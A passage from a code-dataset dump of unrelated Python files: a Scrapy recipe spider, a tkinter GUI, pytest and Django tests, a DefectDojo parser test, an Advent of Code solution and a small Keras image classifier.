scrapy.Request(link, callback=self.parse_recipe)\n n+=1\n\n \n def parse_recipe(self, response):\n r_obj = []\n r_obj = Recipes()\n r_obj['recipe_name'] = response.css('title::text').re('.+(?= Recipe - NYT Cooking)')[0]\n r_obj['num_ratings'] = response.xpath('//script').re('(?<=bootstrap.recipe.num_ratings = )[0-9]+')[0]\n r_obj['avg_ratings'] = response.xpath('//script').re('(?<=bootstrap.recipe.avg_rating = )[0-9]+')[0]\n r_obj['author'] = response.xpath('//span[@class=\"byline-name\"]/text()').extract()[0]\n r_obj['time'] = response.xpath('//ul[@class=\"recipe-time-yield\"]/li/text()')[-1].re('.+')[0]\n r_obj['tags'] = response.css(\"div.tags-nutrition-container p a::text\").extract()\n r_obj['image_urls'] = response.xpath('//*[@id=\"content\"]/div[1]/div/article/div[1]/div[1]/img/@src').extract()\n r_obj['recipe_yield'] = response.xpath('//*[@id=\"content\"]/div[1]/div/article/header/div[2]/ul/li[1]/span[2]/text()').extract()\n #r_obj['nutrition_analysis'] = response.xpath('//*[@id=\"content\"]/div[1]/div/article/div[3]/section[1]/ul[2]/li/div/div[3]/ul/li/h5/text()').extract()\n \n r_obj['ingredients'] = []\n r_obj['nutrition_analysis'] = []\n r_obj['cooking_steps'] = []\n ## Easy to get xpath: right click on tag in chrome insection window!\n \n\n ###############################################\n #loop through all the nutrition contents\n ###############################################\n n_obj = []\n n = 0\n for x in response.xpath('//span[@itemprop=\"nutrition\"]'):\n n_obj.append(Nutritions())\n \n n_obj[n]['calories'] = x.xpath('span[@itemprop=\"calories\"]/text()').extract()\n n_obj[n]['fat'] = x.xpath('span[@itemprop=\"fatContent\"]/text()').extract()\n n_obj[n]['saturatedFat'] = x.xpath('span[@itemprop=\"saturatedFatContent\"]/text()').extract()\n n_obj[n]['transFat'] = x.xpath('span[@itemprop=\"transFatContent\"]/text()').extract()\n n_obj[n]['cabohydrates'] = x.xpath('span[@itemprop=\"carbohydrateContent\"]/text()').extract()\n n_obj[n]['fiber'] = x.xpath('span[@itemprop=\"fiberContent\"]/text()').extract()\n n_obj[n]['protein'] = x.xpath('span[@itemprop=\"proteinContent\"]/text()').extract()\n n_obj[n]['sodium'] = x.xpath('span[@itemprop=\"sodiumContent\"]/text()').extract()\n \n r_obj['nutrition_analysis'].append(dict(n_obj[n]))\n n += 1\n \n ##########################################\n #### cooking steps\n ##########################################\n s_obj = []\n n = 0\n for x in response.xpath('//*[@id=\"content\"]/div[1]/div/article/div[3]/section[2]/ol'):\n s_obj.append(Steps())\n \n s_obj[n]['step'] = x.xpath('.//li/text()').extract()\n r_obj['cooking_steps'].append(dict(s_obj[n]))\n n += 1\n \n #####################################\n #loop through all the ingredients\n #####################################\n i_obj=[]\n q_tmp=[]\n n=0\n for x in response.xpath('//li[@itemprop=\"recipeIngredient\"]'):\n i_obj.append(Ingredients())\n \n i_obj[n]['ingredient'] = x.xpath('span[@class=\"ingredient-name\"]/span/text()').extract()\n i_obj[n]['unit'] = x.xpath('span[@class=\"ingredient-name\"]/text()[1]').extract()\n q_tmp = x.xpath('span[@class=\"quantity\"]/text()').extract()\n if q_tmp==[]:\n q_tmp=[' ']\n i_obj[n]['quantity'] = q_tmp\n \n r_obj['ingredients'].append(dict(i_obj[n]))\n n += 1\n \n return (r_obj)\n\n\n######################################################################################\n################ End of the code ###################################################\n######################################################################################\n\n \n \n \n# u += x.xpath('span[@class=\"ingredient-name\"]/text()[1]').extract()\n# q_tmp = x.xpath('span[@class=\"quantity\"]/text()').extract()\n# if q_tmp==[]:\n# q_tmp=['0']\n# q += q_tmp\n# i += x.xpath('span[@class=\"ingredient-name\"]/span/text()').extract()\n \n \n #create an object\n \n\n# below is the quick way to output data\n\n'''\n yield {\n \n #extract title\n #'recipe_name': response.xpath('//h1[@class=\"recipe-title title name\"]/text()').extract(),\n 'recipe_name': response.css('title::text').re('.+(?= Recipe - NYT Cooking)')[0],\n \n #recipe number of ratings\n 'num_ratings': response.xpath('//script').re('(?<=bootstrap.recipe.num_ratings = )[0-9]+')[0],\n #(?<=foo) Lookbehind Asserts that what immediately precedes the current position in the string is foo\n \n #recipe average ratings\n 'avg_rating': response.xpath('//script').re('(?<=bootstrap.recipe.avg_rating = )[0-9]+')[0],\n \n 'quantity': q,\n \n 'unit': u,\n \n 'ingredients': i,\n \n #author\n 'author': response.xpath('//span[@class=\"byline-name\"]/text()').extract()[0],\n \n #time\n #'time': response.xpath('//ul[@class=\"recipe-time-yield\"]/li/text()').extract()[-1],\n 'time': response.xpath('//ul[@class=\"recipe-time-yield\"]/li/text()')[-1].re('.+')[0],\n \n #tags\n 'tags': response.css(\"div.tags-nutrition-container p a::text\").extract()\n #loop through ingredient list\n\n }\n'''\n \n'''\n # switch to using for loop to extract ingredients, units, and quantity\n #extract a list of ingredients\n 'ingredients': response.xpath('//span[@class=\"ingredient-name\"]/span/text()').extract(),\n #css method to extract ingredients\n #response.css(\"span.ingredient-name span::text\").extract()\n \n #extract quantity of the ingredient\n 'quantity': response.xpath('//span[@class=\"quantity\"]/text()').extract()\n #response.xpath('//li[@itemprop=\"recipeIngredient\"]//span[@class=\"quantity\"]/text()').extract()\n \n #ingredient quantity units, only select the 1st field of text\n 'unit': response.xpath('//span[@class=\"ingredient-name\"]/text()[1]').extract()\n'''\n\n\n\n \n #(?<=foo) (regExp) Lookbehind Asserts that what immediately precedes the current position in the string is foo\n #recipe number of ratings\n #num_ratings = response.xpath('//script').re('(?<=bootstrap.recipe.num_ratings = )[0-9]+')\n \n #recipe average ratings\n #avg_rating = response.xpath('//script').re('(?<=bootstrap.recipe.avg_rating = )[0-9]+')\n\n #extract a list of ingredients\n #ingredients = response.xpath('//span[@class=\"ingredient-name\"]/span/text()').extract()\n #css method to extract ingredients\n #response.css(\"span.ingredient-name span::text\").extract()\n\n #extract title\n #recipe_name = response.xpath('//h1[@class=\"recipe-title title name\"]/text()').extract()\n\n\n #author\n #author = response.xpath('//span[@class=\"byline-name\"]/text()').extract()\n\n #time\n #time = response.xpath('//ul[@class=\"recipe-time-yield\"]/li/text()').extract()[-1]\n\n","sub_path":"nyt_cooking/spiders/nytcooking.py","file_name":"nytcooking.py","file_ext":"py","file_size_in_byte":8899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"22819939","text":"class Cat():\n def __init__(self):\n self.name = \"\"\n self.age = 0\n\n def get_info(self):\n info = \"\"\n info += self.name + \", \"\n info += str(self.age)\n return info\n\ncats = []\n\ndef add_cat():\n new_cat = Cat()\n \n new_cat.name = name_entry.get()\n new_cat.age = int(age_entry.get())\n\n cats.append(new_cat)\n\n update_listbox()\n\ndef update_listbox():\n cat_listbox.delete(0, END)\n\n for cat in cats:\n cat_listbox.insert(END, cat.get_info())\n\ndef display_info():\n selected_indices = cat_listbox.curselection()\n\n if len(selected_indices) > 0:\n first_index = int(selected_indices[0])\n cat = cats[first_index]\n info_label[\"text\"] = cat.get_info()\n\n\n# build the GUI\nfrom tkinter import *\n\nroot = Tk()\n\n\n#instantiate the controls\nname_label = Label(root, text = \"Name\")\nname_entry = Entry(root)\n\nage_label = Label(root, text = \"Age\")\nage_entry = Entry(root)\n\nadd_cat_button = Button(root, text = \"Add Cat\", command = add_cat)\n\ncat_list_label = Label(root, text = \"Cats\")\ncat_listbox = Listbox(root)\n\ndisplay_cat_info_button = Button(root, text = \"Display Info\", command = display_info)\n\ninfo_label = Label(root, text = \" \")\n\n\n#placing controls by grid\nname_label.grid(row=0, column=0)\nname_entry.grid(row=1, column=0)\n\nage_label.grid(row = 2, column = 0)\nage_entry.grid(row = 3, column = 0)\n\nadd_cat_button.grid(row = 4, column = 0)\n\ncat_list_label.grid(row = 0, column = 1)\ncat_listbox.grid(row = 1, column = 1, rowspan = 3)\n\ndisplay_cat_info_button.grid(row = 4, column = 1)\n\ninfo_label.grid(row = 5, column = 0, columnspan = 2)\nroot.mainloop()\n","sub_path":"Python/catManager.py","file_name":"catManager.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"56020638","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\nimport os\nimport sys\nimport argparse\nimport numpy as np\nimport matplotlib as plt\n\nfrom PIL import (\n Image,\n ImageDraw,\n )\n\ndef main(argv=sys.argv[1:]):\n parser = argparse.ArgumentParser()\n parser.add_argument('image')\n parser.add_argument('-s', '--size', default=50, type=int)\n parser.add_argument('-o', '--output', default='var/images')\n args = parser.parse_args(argv)\n im = Image.open(args.image)\n height, width = im.size\n img_size = args.size\n img_size_half = int(img_size / 2)\n\n basename = os.path.basename(args.image)\n output_dir = os.path.join(args.output, basename)\n os.makedirs(output_dir, exist_ok=True)\n for yy in range(0, height-img_size, img_size_half):\n for xx in range(0, width-img_size, img_size_half):\n box = (yy, xx, yy+img_size, xx+img_size)\n image = im.crop(box)\n output_name = '{}-{}-{}-{}.jpg'.format(box[0], box[1], box[2], box[3])\n output_path = os.path.join(output_dir, output_name)\n image.save(output_path)\n # img = ImageDraw.Draw(im)\n print(args.image)\n\nif __name__ == '__main__':\n main()\n","sub_path":"watson_developper_cloud/cutter.py","file_name":"cutter.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"494486780","text":"from unittest.mock import Mock\n\nimport pytest\n\nfrom lambda_splitter.errors import HTTPAwareException\nfrom lambda_splitter.lambda_splitter import LambdaSplitter, LambdaTarget\n\nPATH_PARAMETER_KEY = 'path_parameter'\n\nRESPONSE_STATUS_CODE_FIELD = 'statusCode'\nRESPONSE_BODY_FIELD = 'body'\n\nDEFAULT_SUB_PATH = \"sub_path\"\nSUCCESS_MOCK = Mock(return_value={RESPONSE_STATUS_CODE_FIELD: 200})\n\n\ndef _generate_event(path_parameter: str, sub_path: str, body: str = None, method='GET') -> dict:\n return {\n 'httpMethod': method,\n 'pathParameters': {\n path_parameter: sub_path\n },\n 'body': body\n }\n\n\ndef setup_lambda_splitter(lambda_target: LambdaTarget) -> LambdaSplitter:\n lambda_splitter = LambdaSplitter(PATH_PARAMETER_KEY)\n lambda_splitter.add_sub_handler(DEFAULT_SUB_PATH, lambda_target)\n return lambda_splitter\n\n\n@pytest.fixture\ndef setup_lambda_splitter_with_method_handler():\n return_value = {RESPONSE_STATUS_CODE_FIELD: 200}\n mock_method = Mock(return_value=return_value)\n\n def handler_method(*args, **kwargs): return mock_method(*args, **kwargs)\n lambda_splitter = LambdaSplitter(PATH_PARAMETER_KEY)\n sub_path = 'sub_path'\n lambda_splitter.add_sub_handler(sub_path, LambdaTarget(handler_method))\n return lambda_splitter, mock_method, return_value, sub_path\n\n\n@pytest.fixture\ndef setup_embedded_lambda_splitter(setup_lambda_splitter_with_method_handler):\n lambda_splitter, mock_method, return_value, sub_path = setup_lambda_splitter_with_method_handler\n\n top_path_parameter_key = 'path_parameter_2'\n lambda_splitter_top = LambdaSplitter(top_path_parameter_key)\n top_sub_path = 'sub_path_2'\n lambda_splitter_top.add_sub_handler(top_sub_path, LambdaTarget(lambda_splitter))\n\n return lambda_splitter_top, top_sub_path, sub_path, top_path_parameter_key, return_value, mock_method\n\n\n@pytest.fixture\ndef setup_lambda_splitter_with_unsupported_handler():\n lambda_splitter = LambdaSplitter(PATH_PARAMETER_KEY)\n sub_path = 'sub_path'\n # noinspection PyTypeChecker\n lambda_splitter.add_sub_handler(sub_path, \"unsupported-handler\")\n\n return lambda_splitter, sub_path\n\n\n@pytest.fixture\ndef setup_lambda_splitter_with_json_handler():\n return_value = {RESPONSE_STATUS_CODE_FIELD: 200}\n mock_method = Mock(return_value=return_value)\n\n def handler_method(json): return mock_method(json=json)\n lambda_splitter = LambdaSplitter(PATH_PARAMETER_KEY)\n sub_path = 'sub_path'\n lambda_splitter.add_sub_handler(sub_path, LambdaTarget(handler_method))\n return lambda_splitter, mock_method, return_value, sub_path\n\n\n@pytest.fixture\ndef setup_lambda_splitter_with_method_handler_throws_http_aware_exception(request):\n mock_method = Mock(side_effect=request.param)\n\n def handler_method(): return mock_method()\n lambda_splitter = LambdaSplitter(PATH_PARAMETER_KEY)\n sub_path = 'sub_path'\n lambda_splitter.add_sub_handler(sub_path, LambdaTarget(handler_method))\n return lambda_splitter, mock_method, sub_path\n\n\ndef test_sanitise_path_leading_slash():\n some_path = '/hello/bye'\n\n sanitised_path = LambdaSplitter.sanitise_path(some_path)\n\n assert sanitised_path == 'hello/bye'\n\n\ndef test_sanitise_path_ending_slash():\n some_path = 'hello/bye/'\n\n sanitised_path = LambdaSplitter.sanitise_path(some_path)\n\n assert sanitised_path == 'hello/bye'\n\n\ndef test_sanitise_method():\n some_method = 'gEt'\n\n sanitised_method = LambdaSplitter.sanitise_method(some_method)\n\n assert sanitised_method == 'GET'\n\n\ndef test_call_when_handler_is_a_method(setup_lambda_splitter_with_method_handler):\n lambda_splitter, mock_method, return_value, sub_path = setup_lambda_splitter_with_method_handler\n\n result = lambda_splitter.__call__(_generate_event(PATH_PARAMETER_KEY, sub_path), {})\n\n mock_method.assert_called_once_with()\n assert result == return_value\n\n\ndef test_call_when_method_not_supported(setup_lambda_splitter_with_method_handler):\n lambda_splitter, mock_method, return_value, sub_path = setup_lambda_splitter_with_method_handler\n\n result = lambda_splitter.__call__(_generate_event(PATH_PARAMETER_KEY, sub_path, method='POST'), {})\n\n mock_method.assert_not_called()\n assert isinstance(result, dict)\n assert RESPONSE_STATUS_CODE_FIELD in result\n assert result[RESPONSE_STATUS_CODE_FIELD] == 405\n\n\ndef test_call_when_no_subpath_match(setup_lambda_splitter_with_method_handler):\n lambda_splitter, mock_method, return_value, sub_path = setup_lambda_splitter_with_method_handler\n\n result = lambda_splitter.__call__(_generate_event(PATH_PARAMETER_KEY, 'unknown_path'), {})\n\n mock_method.assert_not_called()\n\n assert RESPONSE_STATUS_CODE_FIELD in result\n assert result[RESPONSE_STATUS_CODE_FIELD] == 404\n assert RESPONSE_BODY_FIELD in result\n assert result[RESPONSE_BODY_FIELD] == \"{{\\\"error\\\": \\\"could not find path for this command, \" \\\n \"possible paths are [ {} ]\\\"}}\".format(sub_path)\n\n\ndef test_call_embedded_splitter(setup_embedded_lambda_splitter):\n lambda_splitter_top, top_sub_path, sub_path, top_path_parameter_key, return_value, mock_method = \\\n setup_embedded_lambda_splitter\n\n event = {\n 'httpMethod': 'GET',\n 'pathParameters': {\n top_path_parameter_key: top_sub_path,\n PATH_PARAMETER_KEY: sub_path\n },\n 'body': ''\n }\n\n result = lambda_splitter_top.__call__(event, {})\n\n mock_method.assert_called_once_with()\n assert result == return_value\n\n\ndef test_runtime_error_when_target_is_not_supported(setup_lambda_splitter_with_unsupported_handler):\n lambda_splitter, sub_path = setup_lambda_splitter_with_unsupported_handler\n with pytest.raises(RuntimeError):\n lambda_splitter.__call__(_generate_event(PATH_PARAMETER_KEY, sub_path), {})\n\n\ndef test_json_body(setup_lambda_splitter_with_json_handler):\n lambda_splitter, mock_method, _, sub_path = setup_lambda_splitter_with_json_handler\n\n result = lambda_splitter.__call__(_generate_event(PATH_PARAMETER_KEY, sub_path, '{\"some-field\": \"some-value\"}'), {})\n\n mock_method.assert_called_once_with(json={'some-field': 'some-value'})\n assert isinstance(result, dict)\n assert RESPONSE_STATUS_CODE_FIELD in result\n assert result[RESPONSE_STATUS_CODE_FIELD] == 200\n\n\ndef test_json_body_when_not_valid_json(setup_lambda_splitter_with_json_handler):\n lambda_splitter, mock_method, _, sub_path = setup_lambda_splitter_with_json_handler\n\n result = lambda_splitter.__call__(_generate_event(PATH_PARAMETER_KEY, sub_path, ''), {})\n\n mock_method.assert_not_called()\n assert isinstance(result, dict)\n assert RESPONSE_STATUS_CODE_FIELD in result\n assert result[RESPONSE_STATUS_CODE_FIELD] == 400\n assert RESPONSE_BODY_FIELD in result\n assert result[RESPONSE_BODY_FIELD] == '{\"error\": \"body must be a valid JSON\"}'\n\n\ndef test_json_body_when_unexpected_exception(setup_lambda_splitter_with_json_handler):\n lambda_splitter, mock_method, _, sub_path = setup_lambda_splitter_with_json_handler\n\n result = lambda_splitter.__call__(_generate_event(PATH_PARAMETER_KEY, sub_path, None), {})\n\n mock_method.assert_not_called()\n assert isinstance(result, dict)\n assert RESPONSE_STATUS_CODE_FIELD in result\n assert result[RESPONSE_STATUS_CODE_FIELD] == 400\n assert RESPONSE_BODY_FIELD in result\n assert result[RESPONSE_BODY_FIELD] == '{\"error\": \"error while trying to handle body\", \"exception\": \"the JSON ' \\\n 'object must be str, bytes or bytearray, not NoneType\"}'\n\n\n@pytest.mark.parametrize('setup_lambda_splitter_with_method_handler_throws_http_aware_exception',\n [HTTPAwareException(status_code=400, error_message='some error!')],\n ids=['400'],\n indirect=True)\ndef test_http_aware_exception(setup_lambda_splitter_with_method_handler_throws_http_aware_exception):\n lambda_splitter, mock_method, sub_path = setup_lambda_splitter_with_method_handler_throws_http_aware_exception\n\n result = lambda_splitter.__call__(_generate_event(PATH_PARAMETER_KEY, sub_path, None), {})\n\n mock_method.assert_called_once_with()\n assert isinstance(result, dict)\n assert RESPONSE_STATUS_CODE_FIELD in result\n assert result[RESPONSE_STATUS_CODE_FIELD] == 400\n assert RESPONSE_BODY_FIELD in result\n assert result[RESPONSE_BODY_FIELD] == '{\"error\": \"some error!\"}'\n\n\n@pytest.fixture\ndef lambda_splitter_with_failing_validation():\n validator_mock = Mock()\n validator_mock.validate.side_effect = RuntimeError(\"some validation error\")\n lambda_target = LambdaTarget(SUCCESS_MOCK, validators=[validator_mock])\n return setup_lambda_splitter(lambda_target)\n\n\ndef test_lambda_splitter_with_failing_validation(lambda_splitter_with_failing_validation):\n lambda_splitter = lambda_splitter_with_failing_validation\n\n with pytest.raises(RuntimeError):\n lambda_splitter.__call__(_generate_event(PATH_PARAMETER_KEY, DEFAULT_SUB_PATH, None), {})\n","sub_path":"tests/helpers/test_lambda_splitter.py","file_name":"test_lambda_splitter.py","file_ext":"py","file_size_in_byte":9058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"368823051","text":"from sanic import Sanic\nfrom sanic_cors import CORS, cross_origin\nfrom config import config\nimport controller\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom decorators import responds_to_options\n\napp = Sanic(__name__)\nCORS(app, origins=config['allowed_host_list'])\n\nengine = create_engine('sqlite:///app.db')\nDBSession = sessionmaker(bind=engine)\ndb_session = DBSession()\n\n\n@app.route('/', methods=['GET'])\nasync def heartbeat(request):\n return controller.get_heartbeat(request)\n\n\n@app.route('/slack-users', methods=['GET'])\nasync def slack_users(request):\n return controller.get_slack_users(request, db_session)\n\n@app.route('/verify-slack-email', methods=['POST', 'OPTIONS'])\n@responds_to_options()\nasync def verify_slack_email(request):\n return controller.post_verify_slack_email(request, db_session)\n\n\n@app.route('/authenticate-user', methods=['GET'])\nasync def authenticate_user(request):\n return controller.authenticate_user(request.json, db_session)\n\n\n@app.route(\"/users\", methods=[\"GET\"])\nasync def users(request):\n return controller.get_app_users(request.json, db_session)\n\n@app.route(\"/teams\", methods=[\"GET\"])\nasync def teams(request):\n return controller.get_teams(request.json, db_session)\n\n\n@app.route(\"/modify-user\", methods=[\"POST\", \"OPTIONS\"])\n@responds_to_options()\nasync def modify_user(request):\n return controller.modify_user(request.json, db_session)\n\n\n@app.route(\"/add-user\", methods=[\"POST\", \"OPTIONS\"])\n@responds_to_options()\nasync def add_user(request):\n return controller.add_user(request.json, db_session)\n\n\n@app.route(\"/add-team\", methods=[\"POST\", \"OPTIONS\"])\n@responds_to_options()\nasync def add_team(request):\n return controller.add_team(request.json, db_session)\n\n\n@app.route(\"/join-team\", methods=[\"POST\", \"OPTIONS\"])\n@responds_to_options()\nasync def join_team(request):\n return controller.join_team(request.json, db_session)\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=8000)\n","sub_path":"server/src/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"478308704","text":"from django.test import TestCase\nfrom dojo.tools.gitlab_dep_scan.parser import GitlabDepScanParser\nfrom dojo.models import Test\n\n\nclass TestGitlabDepScanParser(TestCase):\n\n def test_parse_file_with_no_vuln_has_no_findings(self):\n testfile = open(\n \"dojo/unittests/scans/gitlab_dep_scan/gl-dependency-scanning-report-0-vuln.json\"\n )\n parser = GitlabDepScanParser()\n findings = parser.get_findings(testfile, Test())\n self.assertEqual(0, len(findings))\n\n def test_parse_file_with_one_vuln_has_one_finding(self):\n testfile = open(\n \"dojo/unittests/scans/gitlab_dep_scan/gl-dependency-scanning-report-1-vuln.json\"\n )\n parser = GitlabDepScanParser()\n findings = parser.get_findings(testfile, Test())\n self.assertEqual(1, len(findings))\n\n def test_parse_file_with_two_vuln_has_one_missing_component_(self):\n testfile = open(\n \"dojo/unittests/scans/gitlab_dep_scan/gl-dependency-scanning-report-2-vuln-missing-component.json\"\n )\n parser = GitlabDepScanParser()\n findings = parser.get_findings(testfile, Test())\n self.assertEqual(2, len(findings))\n finding = findings[0]\n self.assertEqual(None, finding.component_name)\n self.assertEqual(None, finding.component_version)\n finding = findings[1]\n self.assertEqual(\"golang.org/x/crypto\", finding.component_name)\n self.assertEqual(\"v0.0.0-20190308221718-c2843e01d9a2\", finding.component_version)\n\n def test_parse_file_with_multiple_vuln_has_multiple_findings(self):\n testfile = open(\n \"dojo/unittests/scans/gitlab_dep_scan/gl-dependency-scanning-report-many-vuln.json\"\n )\n parser = GitlabDepScanParser()\n findings = parser.get_findings(testfile, Test())\n self.assertTrue(len(findings) > 2)\n","sub_path":"dojo/unittests/tools/test_gitlab_dep_scan_parser.py","file_name":"test_gitlab_dep_scan_parser.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"439585982","text":"#http://adventofcode.com/2015/day/14\n\n#1\n\nwith open('Reindeer_Olympics.input', 'r') as f:\n reindeers=f.read()\n nochar=['can fly ', 'km/s for ', 'seconds, but then must rest for ', ]\n for i in nochar:\n if i in reindeers:\n reindeers=reindeers.replace(i, '')\n\n zoo={} \n \n for sor in reindeers.splitlines():\n data = sor.split(' ')\n zoo.setdefault(data[0], [int(data[1]), int(data[2]), int(data[3])]) # rénszarvas: sebesség, haladás, pihenő\n print(zoo)\n\n\n#Given the descriptions of each reindeer (in your puzzle input), after exactly 2503 seconds, \n#what distance has the winning reindeer traveled?\n\n\ndistance=0\nfor k, v in zoo.items():\n base=int(2503 / (v[1] + v[2]))\n d=base * v[0] * v[1]\n m = 2503 % (v[1] + v[2])\n if m > v[1]:\n p = v[1] * v[0]\n else:\n p = m * v[0]\n distance=max(distance, d+p)\n\nprint('A győztes által megtett út:', distance, '\\n')\n\n#2\nwith open('Reindeer_Olympics.input', 'r') as f:\n reindeers=f.read()\n nochar=['can fly ', 'km/s for ', 'seconds, but then must rest for ', ]\n for i in nochar:\n if i in reindeers:\n reindeers=reindeers.replace(i, '')\n\n zoo={} \n points={}\n dist={}\n for sor in reindeers.splitlines():\n data = sor.split(' ')\n zoo.setdefault(data[0], [int(data[1]), int(data[2]), int(data[3])]) # rénszarvas: sebesség, haladás (mp), pihenő (mp)\n points.setdefault(data[0], 0) # rénszarvas: pontok\n dist.setdefault(data[0], 0,) # rénszarvas: megtett út\n print(zoo)\n\n\n \nn=0\n\nwhile n < 2503:\n for k, v in zoo.items():\n m = n % (v[1] + v[2])\n if m < v[1]:\n dist[k]=dist[k] + v[0]\n dd=max(dist.values())\n for l, w in dist.items():\n if w==dd:\n points[l]=points[l] + 1\n n+=1\n\n\nprint(points)\nprint(dist)\nwin=max(points, key=lambda x: points[x])\nprint('A győztes: ', win, ', aki ' , dist[win], ' km utat tett meg és ', points[win], ' pontot szerzett.', sep='')\n","sub_path":"14_Reindeer_Olympics.py","file_name":"14_Reindeer_Olympics.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"441420098","text":"from __future__ import unicode_literals\n\nfrom django.contrib.localflavor.pt.forms import PTZipCodeField, PTPhoneNumberField\n\nfrom django.test import SimpleTestCase\n\n\nclass PTLocalFlavorTests(SimpleTestCase):\n def test_PTZipCodeField(self):\n error_format = ['Enter a zip code in the format XXXX-XXX.']\n valid = {\n '3030-034': '3030-034',\n '1003456': '1003-456',\n }\n invalid = {\n '2A200': error_format,\n '980001': error_format,\n }\n self.assertFieldOutput(PTZipCodeField, valid, invalid)\n\n def test_PTPhoneNumberField(self):\n error_format = ['Phone numbers must have 9 digits, or start by + or 00.']\n valid = {\n '917845189': '917845189',\n '91 784 5189': '917845189',\n '+351 91 111': '+35191111',\n '00351873': '00351873',\n }\n invalid = {\n '91 784 51 8': error_format,\n '091 456 987 1': error_format,\n }\n self.assertFieldOutput(PTPhoneNumberField, valid, invalid)\n","sub_path":"tests/regressiontests/localflavor/pt/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"308655612","text":"'''Print the First 3 multiples of the given number \"N\". (N is a positive integer)\n\nNote: print the characters with a single space between them.\n\nInput Description:\nA positive integer is provided to you as an input.\n\nOutput Description:\nPrint the First 3 multiples of the number with single spaces between them as an output.\n\nSample Input :\n2\nSample Output :\n2 4 6'''\n\ncode\n\nN=int(input())\nfor x in range(1,4):\n a=x*N\n if(x<3):\n print(a,end=' ')\n else:\n print(a)\n","sub_path":"python/774.py","file_name":"774.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"507527609","text":"# import\nfrom sklearn.preprocessing import LabelBinarizer\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report\nfrom tensorflow.keras.preprocessing.image import img_to_array\nfrom shallownet import ShallowNet\nfrom tensorflow.keras.optimizers import SGD\nfrom imutils import paths\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport argparse\nimport cv2\nimport os\nimport random\n\n# construct argument parser\nap = argparse.ArgumentParser()\nap.add_argument(\"-d\", \"--dataset\", required=True,\n\thelp=\"path to the dataset\")\nargs = vars(ap.parse_args())\n\n# grab the images\nprint(\"[INFO] loading images...\")\nimagePaths = list(paths.list_images(args[\"dataset\"]))\nrandom.shuffle(imagePaths)\n# load a batch of images\nimagePaths = imagePaths[:100]\n\n# preprocess the images\ndata = []\nlabels = []\n\nfor (i, imagePath) in enumerate(imagePaths):\n image = cv2.imread(imagePath)\n image = cv2.resize(image, (32, 32))\n image = img_to_array(image)\n label = imagePath.split(os.path.sep)[-1].split(\".\")[0]\n\n data.append(image)\n labels.append(label)\n\n if i != 0 and i % 1000 == 0:\n print(\"[INFO] processing {}/{}...\".format(i, len(imagePaths)))\n # print(labels)\n\ndata = np.array(data)\ndata = data.astype(\"float\") / 255.0\nlabels = np.array(labels)\n\n# split the dataset into train/test\n(trainX, testX, trainY, testY) = train_test_split(data,\n\tlabels, test_size=0.25)\n\n# convert the target int to vectors\ntrainY = LabelBinarizer().fit_transform(trainY)\ntestY = LabelBinarizer().fit_transform(testY)\n\n# compile model\nprint(\"[INFO] compiling model...\")\nopt = SGD(0.005)\nmodel = ShallowNet.build(width=32, height=32, depth=3, \n\tclasses=2)\nmodel.compile(loss=[\"sparse_categorical_crossentropy\"], optimizer=opt,\n\tmetrics=[\"accuracy\"])\n\n# train the network\nprint(\"[INFO] training model...\")\nH = model.fit(trainX, trainY, validation_data=(testX, testY),\n\tbatch_size=32, epochs=100, verbose=1)\n\n# evaluate the model\nprint(\"[INFO] evaluating model...\")\npredictions = model.predict(testX, batch_size=32)\nprint(classification_report(testY.argmax(axis=1),\n\tpredictions.argmax(axis=1), \n\ttarget_names=[\"cat\", \"dog\"]))\n\n# plot the training loss and accuracy\nplt.style.use(\"ggplot\")\nplt.figure()\nplt.plot(np.arange(0, 100), H.history[\"loss\"], label=\"train_loss\")\nplt.plot(np.arange(0, 100), H.history[\"val_loss\"], label=\"val_loss\")\nplt.plot(np.arange(0, 100), H.history[\"accuracy\"], label=\"train_acc\")\nplt.plot(np.arange(0, 100), H.history[\"val_accuracy\"], label=\"val_acc\")\nplt.title(\"Training loss and accuracy\")\nplt.xlabel(\"Epoch #\")\nplt.ylabel(\"Loss/Accuracy\")\nplt.legend()\nplt.show()","sub_path":"Starter/11_ShallowNet/shallownet_animals.py","file_name":"shallownet_animals.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"88691029","text":"#=============================================================================#\n# #\n# MIT LICENSE Copyright (c) 2019 David Longnecker #\n# #\n# Permission is hereby granted, free of charge, to any person obtaining a #\n# copy of this software and associated documentation files (the \"Software\"), #\n# to deal in the Software without restriction, including without limitation #\n# the rights to use, copy, modify, merge, publish, distribute, sublicense, #\n# and/or sell copies of the Software, and to permit persons to whom the #\n# Software is furnished to do so, subject to the following conditions: #\n# #\n# The above copyright notice and this permission notice shall be included in #\n# all copies or substantial portions of the Software. #\n# #\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 